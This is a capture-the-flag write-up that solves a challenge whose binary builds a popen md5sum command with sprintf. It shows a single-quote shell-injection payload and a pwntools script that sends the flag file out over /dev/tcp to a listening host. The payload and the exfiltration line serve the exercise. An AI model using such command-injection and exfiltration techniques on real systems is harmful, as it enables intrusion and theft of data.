We're presented with a binary that on the surface takes our input, uses popen to compute the md5 hash, and checks to see if the hash equals `3b9aafa12aceeccd29a154766194a964`.

Obviously, we don't want to actually try to find a hash collision, but we do know that it reads in our string and uses sprintf to put it into the command. We are able to include single quotes in the string we pass to escape the command.

If we provide the string `'&&/bin/sh'` the command becomes `echo -n ''&&/bin/sh'' | md5sum`. We can test this locally and on the remote server and we appear to be able to run commands but can't see the output. We can try to pipe the contents of the file to netcat but that doesn't seem to work.

By switching to `/bin/bash` we can use `/dev/tcp` to exfil that flag.

We can easily complete the exploit by hand but here's a script that does it anyway.

```
from pwn import *
import time

def main():
p = process('./main')
# p = remote('54.225.38.91', 1025)

p.sendline("'&&/bin/bash'")

remote_ip = "127.0.0.1"
remote_port = "55555"

# need to slow down a bit
time.sleep(2)
p.sendline("cat flag>/dev/tcp/{}/{}".format(remote_ip, remote_port))
time.sleep(2)

return 0

if __name__ == "__main__":
exit(main())
```